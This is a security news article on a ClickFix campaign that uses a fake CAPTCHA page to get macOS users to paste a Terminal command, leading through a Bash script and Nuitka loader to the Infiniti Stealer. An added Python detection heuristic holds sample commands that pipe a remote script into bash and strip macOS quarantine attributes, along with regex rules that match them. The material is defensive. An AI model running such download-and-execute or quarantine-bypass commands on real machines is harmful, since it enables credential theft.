The infection chain includes a fake CAPTCHA page, a Bash script, a Nuitka loader, and the Python-based infostealer.
A new macOS-targeted cyberattack campaign is leveraging a deceptive fake CAPTCHA page to trick users into executing malicious commands, highlighting the growing sophistication of social engineering tactics in cross-platform threats. Security researchers have identified the attack as part of the evolving “ClickFix” technique, which has been widely used since 2024 but is now increasingly adapted to target Apple devices.
The attack begins with a fraudulent Cloudflare-style human verification page that appears legitimate and prompts users to complete a verification step. Instead of traditional CAPTCHA interaction, users are instructed to open the Terminal application and paste a command, creating a false sense of authenticity while bypassing typical browser-based security expectations.
Once executed, the command downloads a malicious Bash script from a remote server. The script decodes an embedded payload, writes a secondary binary into a temporary directory, removes macOS quarantine protections, and executes the file. It also injects command-and-control (C&C) server details and authentication tokens as environment variables before deleting itself and closing the Terminal, minimizing visible traces of the attack.
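The stages described above leave a recognisable trail in process telemetry: a download piped into a shell, a quarantine attribute stripped from a file in a temporary directory, the script removing itself, and the Terminal being closed. The following detection heuristic is an added example, not code from the article or the researchers; it runs over constructed process events with assumed field names (`session`, `cmdline`) and assumed command forms for the self-delete and Terminal-close steps.

```python
import re
from collections import defaultdict

# Constructed process-execution events, not real telemetry. Each row is one
# process spawned under a Terminal session; field names are assumptions.
SAMPLE_EVENTS = [
    {"session": "s1", "cmdline": 'bash -c "curl -fsSL http://example.invalid/v.sh | bash"'},
    {"session": "s1", "cmdline": "xattr -d com.apple.quarantine /tmp/.x/loader"},
    {"session": "s1", "cmdline": "/tmp/.x/loader"},
    {"session": "s1", "cmdline": "rm -f /tmp/v.sh"},
    {"session": "s1", "cmdline": "osascript -e 'quit app \"Terminal\"'"},
    # Benign: a user stripping quarantine from an app they installed on purpose.
    {"session": "s2", "cmdline": "xattr -d com.apple.quarantine /Applications/Foo.app"},
    {"session": "s3", "cmdline": "git clone https://example.invalid/repo"},
]

TEMP_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/")

# Regex rules for the stages the article describes: a pasted command that
# pipes a downloaded script into a shell, the script deleting itself, and
# the Terminal window being closed (exact commands here are assumptions).
RULES = [
    ("remote_script_to_shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")),
    ("script_self_delete", re.compile(r"\brm\s+-f\b.*\.sh\b")),
    ("terminal_closed_by_script", re.compile(r'killall\s+Terminal|quit app "Terminal"')),
]

def quarantine_strip_in_tempdir(cmdline: str) -> bool:
    """xattr removing com.apple.quarantine from a file under a temp dir."""
    parts = cmdline.split()
    if not parts or parts[0] != "xattr" or "-d" not in parts or "com.apple.quarantine" not in parts:
        return False
    return any(p.startswith(TEMP_DIRS) for p in parts)

def classify(cmdline: str) -> list:
    """Return the names of every stage this single command line matches."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    if quarantine_strip_in_tempdir(cmdline):
        hits.append("quarantine_strip_in_tempdir")
    return hits

def score_sessions(events, min_hits=2) -> dict:
    """Map session id -> sorted unique findings; sessions with fewer than
    min_hits distinct stages are dropped so a lone xattr does not alert."""
    findings = defaultdict(set)
    for ev in events:
        findings[ev["session"]].update(classify(ev["cmdline"]))
    return {s: sorted(f) for s, f in findings.items() if len(f) >= min_hits}

if __name__ == "__main__":
    for session, hits in score_sessions(SAMPLE_EVENTS).items():
        print(session, hits)
```

Correlating several stages per Terminal session is what keeps the false-positive rate tolerable, since a developer legitimately stripping quarantine from one downloaded tool will trip only a single rule.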
At the core of the infection chain is a loader compiled using Nuitka, a tool that converts Python code into native binaries. Because the Python source no longer ships as readable scripts or bytecode, this significantly complicates static analysis and detection, helping the malware evade traditional security mechanisms. When executed, the loader decompresses hidden data and deploys the final payload, Infiniti Stealer.
Infiniti Stealer is a Python-based information-stealing malware designed to extract a wide range of sensitive data from compromised systems. Its targets include browser-stored credentials, macOS Keychain data, cryptocurrency wallets, developer-related secrets, and screenshots captured during the attack process.
The stolen data is transmitted to the attacker-controlled infrastructure via HTTP POST requests. Once exfiltration is complete, the malware sends notifications to a Telegram channel and queues the stolen credentials for further processing, including potential password cracking on remote servers.
To avoid detection, Infiniti Stealer incorporates multiple evasion techniques, including randomized execution delays and checks to determine whether it is running in a sandbox or analysis environment. These features help the malware remain undetected for longer periods and increase the likelihood of successful data exfiltration.
Researchers note that this campaign marks a significant shift in threat actor strategies, as techniques previously effective on Windows systems are now being refined for macOS environments. The use of compiled Python binaries and advanced social engineering methods suggests that attackers are investing in more sophisticated tooling to expand their reach.
As macOS continues to gain popularity in enterprise and developer environments, this evolution in attack techniques underscores the need for heightened user awareness and stronger endpoint security measures. The rise of ClickFix-based campaigns targeting Mac users signals a broader trend where no operating system is immune to increasingly adaptive cyber threats.